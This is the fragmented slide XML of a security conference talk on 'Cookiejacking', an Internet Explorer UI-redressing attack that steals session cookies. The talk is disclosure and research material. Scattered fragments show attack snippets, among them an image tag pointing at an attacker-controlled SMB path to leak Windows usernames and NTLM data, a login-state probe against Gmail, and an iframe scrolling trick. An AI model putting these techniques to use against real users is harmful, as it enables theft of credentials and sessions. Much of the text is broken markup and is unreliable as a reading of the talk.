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D82-BC29-4D6D-8FD3-6B2356D5B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CD4C-7BFF-4B68-89EF-F1DE8062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7DA-693B-4B12-B723-457862F2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C346-1B2E-4DEC-8E36-5410FD25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9708-78B3-4186-B273-F2A1D6D9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4573-35AA-44A7-8564-7624286D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EF39-52AD-462E-B755-520D6F5B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D5C-D999-47DC-9C6F-46B28ACFD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AA75-A3ED-4DB7-BB5C-1F37F01D4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C882-93C5-4796-B10D-9751120A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6494-E22D-47DB-B8C6-764269AA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05F2-68E3-43FD-A3B0-96A42F863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8DB6-D7DA-40D3-A8A1-4C7A0A36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E59B-DDC3-42A6-A872-8027E4C2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D45D-F9CE-4CE5-B1D3-20C0F3D4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F7CD-710E-4305-B8BE-22AE96502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3E75-ED40-4679-AC12-949C42B1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55AD-D901-4AF9-A609-45DE5A15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E10F-FC2C-473B-AEA0-3C8DC616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00F0-7A33-4E21-ACDF-DF4CC1C1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F106-A924-4384-BAF9-9C8538E1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DAD8-A0B7-4446-B261-940AF9CE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CEC7-8754-4825-AB7D-2C57389F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F03-801B-4E64-9CC8-F80670C3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1BC-EE33-4FB7-BB31-4941828B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90D-20D5-4BE6-872D-173927EB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7B3-781D-47B8-85CD-B565D83B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9234-F9FD-4400-94BA-B0FE915A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099-27C0-447B-88F7-EC8E42B7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7F79-60B1-4420-A609-E417C0BD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5ABC-21A0-4E5A-82A8-7DD8400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A850-6D83-4000-9AA5-92300815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76720" y="274680"/>
            <a:ext cx="5410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B809-5833-4910-B34D-9820A0DF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F20-EDA8-42E0-9376-5402AFF0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138-736C-4277-800B-9A70E05D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1AEA-6A71-48F4-835B-BC743D3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1976-72C6-42C2-8BAB-B4366B9A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449C-60A6-4AF5-886C-115A770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4174-417C-4635-8224-925D8F84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B53-3E17-4E38-8960-944C2680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4EE-3872-4AF7-8C60-74417856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EED-ABE0-4003-A8DE-1A79037C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F62-093D-417F-A7F5-A640F5D2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76720" y="274680"/>
            <a:ext cx="5410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528-3C39-421E-B0EC-F0BC3482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75E-FF89-4F66-8E7C-AAD81E27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125-1BC5-4114-AFB0-9AA9875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1F1-4988-4173-BD6B-23AD30AE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1FCB-15BE-4335-8629-63389FE93E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64911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Rosario Valotta  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 Cookie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quare7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FEC8-9A5C-4E8E-A46D-DEF478FFA7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3.jpe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hyperlink" Target="http://www.useragentman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2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9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-174240" y="1484280"/>
            <a:ext cx="4114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lien League"/>
              </a:rPr>
              <a:t>Cookie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lien League"/>
              </a:rPr>
              <a:t>Rosario Valo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0" r="0" b="14952"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="436572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6437160" y="1406520"/>
            <a:ext cx="2598840" cy="353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2">
            <a:alphaModFix amt="32000"/>
          </a:blip>
          <a:srcRect l="0" t="0" r="75087" b="78261"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3917880" y="1835280"/>
            <a:ext cx="64764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 Box 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6581880" y="111744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7661160" y="48625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"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="33245" t="78153" r="41841" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3917880" y="3062160"/>
            <a:ext cx="647640" cy="7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Line 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3917880" y="1412640"/>
            <a:ext cx="2525760" cy="35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4565520" y="2125800"/>
            <a:ext cx="2592360" cy="42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 flipV="1">
            <a:off x="4565520" y="1477440"/>
            <a:ext cx="2592360" cy="3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4565520" y="3782880"/>
            <a:ext cx="3391200" cy="108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 flipH="1" flipV="1">
            <a:off x="3917880" y="3782520"/>
            <a:ext cx="338472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565520" y="3062160"/>
            <a:ext cx="345600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64000" y="-14760"/>
            <a:ext cx="54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Advanced Clickjacking: c</a:t>
            </a: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ntent extracti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557520" y="1333440"/>
            <a:ext cx="2735280" cy="3888000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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ANd9GcR7kp4-_l0TPKU-Vwg3tscrVKB7gOVpkrtwSu0ea_iiOxhah5FGTnrOPrMP5w"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3780000" y="1628640"/>
            <a:ext cx="865080" cy="8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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4997520" y="1549440"/>
            <a:ext cx="936720" cy="33130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541800" y="1125360"/>
            <a:ext cx="403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on the start point of the selection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starts to select content (e.g. text or html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on the end point of the selection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stops select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ird party iframe is positioned somewhere between A and B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victim drags the selected content into an attacker controlled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0" y="620640"/>
            <a:ext cx="63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technique is made up of 6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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716360" y="2708280"/>
            <a:ext cx="792360" cy="216000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 150840 w 792360"/>
              <a:gd name="textAreaRight" fmla="*/ 58932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4" hR="21600" stAng="10800000" swAng="5400000"/>
                <a:lnTo>
                  <a:pt x="11948" y="0"/>
                </a:lnTo>
                <a:arcTo wR="8224" hR="21600" stAng="-5400000" swAng="2231280"/>
                <a:lnTo>
                  <a:pt x="20726" y="11912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18310" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14146" y="11912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15574" y="11912"/>
                </a:lnTo>
                <a:arcTo wR="8224" hR="21600" stAng="-3168720" swAng="-1927823"/>
                <a:lnTo>
                  <a:pt x="10086" y="561"/>
                </a:lnTo>
                <a:arcTo wR="8224" hR="21600" stAng="-5703457" swAng="-5096543"/>
                <a:close/>
              </a:path>
              <a:path fill="darkenLess" w="21600" h="21600">
                <a:moveTo>
                  <a:pt x="0" y="21600"/>
                </a:moveTo>
                <a:arcTo wR="8224" hR="21600" stAng="10800000" swAng="5400000"/>
                <a:lnTo>
                  <a:pt x="8224" y="0"/>
                </a:lnTo>
                <a:arcTo wR="8224" hR="21600" stAng="-5400000" swAng="303457"/>
                <a:lnTo>
                  <a:pt x="10086" y="561"/>
                </a:lnTo>
                <a:arcTo wR="8224" hR="21600" stAng="-5703457" swAng="-509654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4068720" y="2492280"/>
            <a:ext cx="287280" cy="360360"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 3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6469200" y="1450800"/>
            <a:ext cx="649080" cy="721080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffff9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7308720" y="4246560"/>
            <a:ext cx="648000" cy="649440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffff99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7451640" y="2637000"/>
            <a:ext cx="649440" cy="72072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3500280"/>
            <a:ext cx="7164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nsights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loads cookie text file (0-day)  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all image overlapped on the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ontent extraction techniqu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50560" y="-27000"/>
            <a:ext cx="6202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Attacks mash-up: how the SOP was w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5"/>
          <a:srcRect l="2955" t="30833" r="87308" b="12462"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7236000" y="260280"/>
            <a:ext cx="1701720" cy="619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1280" y="234792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93996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rcRect l="0" t="11991" r="5493" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3203640" y="101268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440000" y="17334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3203640" y="242100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27640" y="4152960"/>
            <a:ext cx="2219400" cy="2174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Opacity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4435560"/>
            <a:ext cx="2219400" cy="217440"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:pr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Z-index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4941720"/>
            <a:ext cx="2219400" cy="217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Opacity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40240" y="5224320"/>
            <a:ext cx="2219400" cy="217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quare721 BT"/>
              </a:rPr>
              <a:t>Z-index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3203640" y="48672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80000" y="4148280"/>
            <a:ext cx="515448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42116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987640" y="306864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80000" y="2276640"/>
            <a:ext cx="5154480" cy="1584000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="808080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708360" y="2421000"/>
            <a:ext cx="518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rag &amp; drop API doesn’t work well across brow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wo different dragging actions required in order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Square721 BT"/>
              </a:rPr>
              <a:t>selec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Square721 BT"/>
              </a:rPr>
              <a:t>drag&amp;drop it out of the i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quare721 BT"/>
              </a:rPr>
              <a:t>Drag &amp; drop</a:t>
            </a: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470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rag &amp; drop APIs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cknowledged as one of the innovations introduced in HTML5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Not formally part of latest HTML5 draft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Based on Microsoft’s original implementation available on IE 5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Not fully supported on IE 6,7,8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ustom implementation on </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="it-IT" sz="1600" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="009999"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Square721 BT"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://www.useragentman.com</a:t>
            </a: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orks well on all IE version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ustom effects: drag feedback image, cursor shape change, etc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8388360" y="587700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Square721 BT"/>
              </a:rPr>
              <a:t>Advanced content extraction</a:t>
            </a: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256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wo nested iframes defined in the attacker pag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frames sizes properly defined in order to ensure that scrolling is needed for the cookie (B content) to completely come into view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E.g. A.height=100; B.height=500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sequence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moves the mouse over the B ifram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hen user clicks down the mouse button the “onfocus” event is trigger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he </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="it-IT" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Square721 BT"/>
              </a:rPr>
              <a:t>scrollspeed</a:t>
            </a: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 property of the iframe A is set to 100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ith the mouse button down and the iframe B scrolling into iframe A, the final effect is that the user is selecting text as long as the mouse button is click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 the scrollspeed is big enough, a single click time is enough to select the whole cookie content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157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First drag action (content selection) collapsed in a click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388360" y="587700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5435640" y="1125360"/>
            <a:ext cx="3527280" cy="2592360"/>
            <a:chOff x="5435640" y="1125360"/>
            <a:chExt cx="3527280" cy="2592360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5435640" y="1125360"/>
              <a:ext cx="3527280" cy="2592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5722920" y="1557000"/>
              <a:ext cx="936000" cy="20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You must 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he ifr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he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o ens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that scrol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is needed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mplete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select t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5578200" y="1412640"/>
              <a:ext cx="3097080" cy="504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53753" dir="2700000" blurRad="0" rotWithShape="0">
                <a:srgbClr val="7a99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5722920" y="1569600"/>
              <a:ext cx="936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ok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5724360" y="1557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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5796000" y="126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6372360" y="126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6084720" y="126828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869800" y="4005360"/>
            <a:ext cx="2847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onfocus=“scrollspeed=10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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7308720" y="1844640"/>
            <a:ext cx="792360" cy="21607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8497800" y="141444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2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8510760" y="17478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3203640" y="48672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780000" y="4148280"/>
            <a:ext cx="515448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42116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3059280" y="3068640"/>
            <a:ext cx="576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95280" y="-27000"/>
            <a:ext cx="6491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I know your (user)nam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Exploit a “feature” of IE (already discussed by Jorge Medina in 2010)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 supports access to file system objects on SMB shares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s UNC (Universal Naming Convention) paths to reference them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an be used without restrictions inside web pages in the Internet zone or abov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619280" y="2565360"/>
            <a:ext cx="5256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mg src="\\[WEB SERVER IP ADDRESS]\image.jpg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4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6913440" y="3174840"/>
            <a:ext cx="1043280" cy="104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8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="647640" y="3141720"/>
            <a:ext cx="11160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252" name="AutoShape 43"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="250" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1909440" y="3677760"/>
            <a:ext cx="500436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3" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620000" y="3387600"/>
            <a:ext cx="2852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nonymous access is tried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43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1908000" y="4202280"/>
            <a:ext cx="5004720" cy="194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255" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3904560" y="3933720"/>
            <a:ext cx="2687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nonymous access is den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43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1908000" y="4849560"/>
            <a:ext cx="50047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7" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562760" y="4581360"/>
            <a:ext cx="3451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NTLM Challenge/Response Nego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43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1908000" y="5354280"/>
            <a:ext cx="50047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9" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1563480" y="5043600"/>
            <a:ext cx="5389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Windows Username, Windows Computer Name, Windows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8920" y="4221000"/>
            <a:ext cx="0" cy="12240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51640" y="4221000"/>
            <a:ext cx="0" cy="122400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941720"/>
            <a:ext cx="1800360" cy="5050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  <a:effectLst>
            <a:outerShdw dist="153753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6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7164360" y="544500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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7018200" y="58770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ptur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issing piece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50148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24000" y="37512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95280" y="15955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26028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33872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55864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33336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224000" y="98100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72080" y="530064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558792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6"/>
          <a:srcRect l="0" t="11991" r="5493" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2987640" y="170028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2995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1246320" y="23353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3059280" y="3068640"/>
            <a:ext cx="576000" cy="536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3059280" y="4365720"/>
            <a:ext cx="57600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11280" y="43920"/>
            <a:ext cx="62755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Little dirty secret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518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OS version can be retrieved through a little J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XP =   navigator.userAgent.indexOf("Windows NT 5.1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Vista= navigator.userAgent.indexOf("Windows NT 6.0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Win7=  navigator.userAgent.indexOf("Windows NT 6.1");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s the cookie valid?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rue if the victim is logged on a given website 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if a victim is logged using a “probing” approach (Jeremiah Grossman, 2006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ynamic attack setup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Probing for user authentica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Only define iframes to load valid cookies (1 iframe loads 1 cookie)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84360" y="3645000"/>
            <a:ext cx="82087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mg src="https://mail.google.com/mail/pimages/2/labs/labs_bar_icon.png" onload=“doThis()" onerror=“doThat()”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8000" y="43920"/>
            <a:ext cx="6778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Ready to pown…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16360" y="53038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816360" y="39639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987640" y="188424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54936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458964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87640" y="587520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5580000" y="622440"/>
            <a:ext cx="576360" cy="536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816360" y="127008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rcRect l="0" t="11991" r="5493" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5580000" y="1989000"/>
            <a:ext cx="576360" cy="536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987640" y="3246480"/>
            <a:ext cx="2376360" cy="64908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Optimiz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838680" y="262404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rcRect l="0" t="11991" r="5493" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5580000" y="332568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rcRect l="0" t="11991" r="5493" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5580000" y="4654440"/>
            <a:ext cx="576360" cy="536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rcRect l="0" t="11991" r="5493" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5580000" y="5950080"/>
            <a:ext cx="5763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Me, myself and I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he IE security zone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IE 0-day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Overview on UI redressing attack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Solving the jigsaw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he big picture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 algn="r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5" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2613000">
            <a:off x="2374560" y="3754440"/>
            <a:ext cx="57636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76720" y="58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The big picture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300" name="Picture 10" descr="ie-girl"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="250920" y="981000"/>
            <a:ext cx="947520" cy="9334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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1654560" y="2349360"/>
            <a:ext cx="50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A page containing  &lt;img src=“\\attackerIP\dummy&gt; is serve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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1708200" y="2771640"/>
            <a:ext cx="4952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Victim’s browser requests img and send Windows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882800" y="5418000"/>
            <a:ext cx="379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Victim is cookiejacked and sends his cook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7" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8028000" y="3348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0" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352520" y="2438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4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6877080" y="981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5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="15440" t="11890" r="23426" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7956720" y="981000"/>
            <a:ext cx="934920" cy="844560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="800080"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="308" name="Picture 36" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6875640" y="24130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37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187280" y="291636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8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295280" y="83664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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729480" y="284472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apture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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7812000" y="37800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User.t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AutoShape 42"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="308" idx="3"/>
            <a:endCxn id="304" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7450200" y="2700000"/>
            <a:ext cx="807120" cy="64836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14" name="AutoShape 43"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="305" idx="3"/>
            <a:endCxn id="308" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1909800" y="2700000"/>
            <a:ext cx="4966560" cy="180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pic>
        <p:nvPicPr>
          <p:cNvPr id="315" name="Picture 44" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6877080" y="33321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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6730920" y="3763800"/>
            <a:ext cx="81288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Redir.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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7451640" y="3564000"/>
            <a:ext cx="57636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48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1909800" y="3618720"/>
            <a:ext cx="4966560" cy="18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19" name="Rectangle 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1959840" y="3348000"/>
            <a:ext cx="45608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Onerror event the browser is redirected to a perl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50" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403280" y="3984480"/>
            <a:ext cx="557280" cy="557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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1238400" y="4462560"/>
            <a:ext cx="957240" cy="39852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agPoc.html#user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AutoShape 52"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="316" idx="2"/>
            <a:endCxn id="320" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4425120" y="1552680"/>
            <a:ext cx="246960" cy="517752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3" name="Rectangle 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2019240" y="4365720"/>
            <a:ext cx="5048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The script read the username sniffed and redirect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Square721 BT"/>
              </a:rPr>
              <a:t>browser to the PoC page with the hash value set to user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4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6950160" y="501336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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6732720" y="5479920"/>
            <a:ext cx="934920" cy="246240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="993366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ollect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AutoShape 56"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="321" idx="2"/>
            <a:endCxn id="324" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="4116960" y="2468160"/>
            <a:ext cx="432360" cy="5233320"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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42920" y="259920"/>
            <a:ext cx="475164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Square721 BT"/>
              </a:rPr>
              <a:t>The perfect PoC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appealing “content”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+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Square721 BT"/>
              </a:rPr>
              <a:t>- willingly “interact” with her</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1800"/>
            </a:br>
            <a:br>
              <a:rPr sz="1800"/>
            </a:br>
            <a:br>
              <a:rPr sz="1400"/>
            </a:br>
            <a:br>
              <a:rPr sz="1400"/>
            </a:br>
            <a:endParaRPr b="1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4686120" cy="70293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21672" t="59450" r="21672" b="16908"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5651640" y="4508640"/>
            <a:ext cx="22320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Conclusions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ookiejacking: a new kind of UI redressing attack, exploiting a 0-day vulnerability in all versions of IE, all version of Windows boxes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Allows an attacker to steal session cookies, no XSS needed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Web site independent: it’s a browser flaw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urrent countermeasures against Clickjacking don’t work with Cookiejacking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Think about using Flash…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It’s supposed to last for a long time: there is a huge installation base all over the world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1908000" y="2133720"/>
            <a:ext cx="5410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Thank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 rot="388200">
            <a:off x="3924360" y="4869000"/>
            <a:ext cx="21715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Me, myself and I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Day time: IT professional, mobile TLC company, Rome, Italy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Night time: web security fan since 2007, released a bunch of advisories and PoCs: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Nduja Connection: first ever cross domain XSS worm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ritical Path Memova : 40 Millions users worldwide affected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WMP: information gathering and intranet scanning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OWA: CSRF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Blog: http://sites.google.com/site/tentacoloviola/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720" y="274680"/>
            <a:ext cx="5543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verview on IE security zon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349"/>
              </a:spcBef>
              <a:buSzPct val="1321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n IE, a web site is assigned to a security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ites in the same security zone behave the same way according to security privilege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5 default zone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ocal Machine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ocal Intranet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Trusted Sites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nternet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Restrited Sites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Security profiles: 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 collection of security privileges that can be granted to each given zone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Predefined: High, Medium, Medium-Low, Low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ustomized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-277560">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="1157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Privileges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ActiveX &amp; plugin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Downloads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authentica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cript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601560" indent="-231480">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="349"/>
              </a:spcBef>
              <a:buSzPct val="11740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ross zone interaction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7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3094560" y="2169360"/>
            <a:ext cx="1297080" cy="647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  <a:effectLst>
            <a:outerShdw dist="153753" dir="2700000" blurRad="0" rotWithShape="0">
              <a:srgbClr val="4c00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492360" y="2276640"/>
            <a:ext cx="3456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reasing security privile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43280" y="4941720"/>
            <a:ext cx="3652200" cy="1441440"/>
            <a:chOff x="4643280" y="4941720"/>
            <a:chExt cx="3652200" cy="1441440"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="103" name="Picture 4" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId19"/>
            <a:srcRect l="0" t="0" r="2015" b="26121"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4643280" y="4941720"/>
              <a:ext cx="3600360" cy="14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1215600">
              <a:off x="7091280" y="5546160"/>
              <a:ext cx="1152360" cy="504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  <a:effectLst>
              <a:outerShdw dist="153753" dir="2700000" blurRad="0" rotWithShape="0">
                <a:srgbClr val="4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"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6227640" y="5186160"/>
              <a:ext cx="2016000" cy="3070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idden by defau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ANd9GcRGb_TvCq1ZSgruAER2T0lnq-i4oWLIqsJNqcVRC7kENVj_PZzh"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2482920" y="22892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74680"/>
            <a:ext cx="62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Cross Zone Interaction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By rule of thumb a web content belonging to a less privileged zone cannot access content belonging to more privileged zone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594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So it should be impossible for a web content to access local machine files. It should be.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771640" y="2362320"/>
